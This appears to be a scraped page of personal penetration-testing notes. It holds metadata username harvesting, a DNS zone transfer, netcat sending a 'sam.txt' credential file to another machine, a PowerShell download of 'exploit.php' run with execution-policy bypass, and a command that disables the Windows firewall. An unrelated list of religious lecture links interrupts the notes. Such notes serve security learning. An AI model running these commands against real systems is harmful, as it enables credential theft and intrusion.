nagpentest

  Custom user lists • So, lets take some word docs and pull out the user names and first and last names! • What about Web? wget -r -l1 --no-parent -A.doc http://www.somewebsite.com/ | exiftool -r -a -u -Author - LastSavedBy * >users.txt |strings users.txt | cut -d":" -f2 | grep -v "\=" | grep -v "\image files read" | tr '[:space:]' '\n' | sort | uniq >cleanusers.txt • local disk? exiftool -r -a -u -Author -LastSavedBy * >users.txt |strings users.txt | cut -d":" -f2 | grep -v "\=" | grep -v "\image files read" | tr '[:space:]' '\n' | sort | uniq >cleanusers.txt More info at http://www.pauldotcom.com/Metadata_the_Silent_Killer_NS2009.pdf ================================================================ exclude hml, php, asp and cgi extensions # wget -nd -r -R htm,html,php,asp,aspx,cgi -P /home/tools/metadata_from_[website_name] [target_domain] alternatively, we coul have included only

whois at the command line $whois [-h whois_server] name (there are many other command line arguments) $man whois ===================== zone transfer for all records for a given domain. It possible could be blocked on the DNS server or firewall. DNS zone transfer r carried over tcp 53 where as dns queries use udp 53 nslookup set type-any server ns1.abc.abc ls -d abc.abc > dnstranfer.abc.abc.txt ===================== What is DNS Authority? What is an Authoritative DNS Server? What is an Authoritative DNS Response? What is a Non-Authoritative DNS Server? What is a Non-Authoritative DNS Server Response? What is DNS Authority? Any DNS server that contains a complete copy of the domain's zone file is considered to be authoritative for that domain. A complete copy of a zone file must have: a valid Start of Authority ( SOA ) record, valid Name Server ( NS ) records for the domain, and the listed NS records should match the servers listed in the SOA record. Servers listed in the

moving files using nc.exe from the receiving machine run this cmd > nc -n -l -p 2222 > /tmp/sam.txt from the sending machine run this cmd > nc -v -n -w3 ip_of_the_receiving_pc 2222 < sam.txt === File transfer script using  ftp. Remove the space after each cmd and before >> sign Powersheel scrip to download a file $storage = $pwd $webclient = New-Object System.Net.Webclient $url = " http://10.0.1.5/exploit.php " $file = "exploit.php" $webclient.DownloadFile($url,$file) C:\powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File get.ps1 Powershell FTP upload and download  from https://www.thomasmaurer.ch/2010/11/powershell-ftp-upload-and-download/ ====== Creating a file remotely echo 'Some Text' > /remotefile.txt ========

pkgmgr /iu:"TelnetClient" pkgmgr /iu:”TelnetServer” more info at http://technet.microsoft.com/en-us/library/cc770501(WS.10).aspx

wget --wait=20 --limit-rate=20K -r -p -U Mozilla http://www.stupidsite.com/restricedplace.html 1) -r  = download sites recursive 2) -U = tells the site you are using some commonly accepted browser: 3) --limit-rate= and 4) --wait=. You should add --wait=20 to pause 20 seconds between retrievals, this makes sure you are not manually added to a blacklist. --limit-rate defaults to bytes, add K to set KB/s. 5) --no-parent is a very handy option that guarantees wget will not download anything from the folders beneath the folder you want to acquire. Use this to make sure wget does not fetch more than it needs to if just just want to download the files in a folder. source=http://linuxreviews.org/quicktips/wget/

sh firewall set opmode mode=disable and more at http://social.technet.microsoft.com/Forums/en-US/winservercore/thread/5a438757-d294-483d-8619-df9eb5700561/

Network Footprinting (Reconnaissance) The tester would attempt to gather as much information as possible about the selected network. Reconnaissance can take two forms i.e. active and passive. A passive attack is always the best starting point as this would normally defeat intrusion detection systems and other forms of protection etc. afforded to the network. This would usually involve trying to discover publicly available information by utilising a web browser and visiting newsgroups etc. An active form would be more intrusive and may show up in audit logs and may take the form of an attempted DNS zone transfer or a social engineering type of attack. http://www.vulnerabilityassessment.co.uk/

http://www.kalamullah.com/lectures.html http://www.hoor-al-ayn.com/lectures/abu-adnan/ http://www.kalamullah.com/?C=N;O=D http://www.aswatalislam.net/ http://www.alquranic.com/downloads/ http://nadeem.lightuponlight.com/indexaudios.html http://nadeem.lightuponlight.com/

Welcome to the official THC web site. THC is an acronym for 'The Hacker's Choice' and a group of international experts involved in network and system security. The group looks back on a long history, it was founded in 1995 and published over 70 technical papers and software releases covering a wide range of computer security aspects. Currently, THC is among the top non-commercial security groups worldwide. http://freeworld.thc.org/ ======================================== Linux/Unix Account lockout with PAM Tally to check whether account lockout is in use: # grep tally /etc/pam.d if /etc/pam.conf is in use, the command be # grep tally /etc/pam.conf if PAM is being used for account lockout the output should looks like auth required /lib/security/pam_tally.so deny=5 onerr=fail lock_time=180 reset no_magic_root description: authentication (auth) for given service we require the system to run the library called pam_tall.so which is cfg to deny access after 5 bad login attept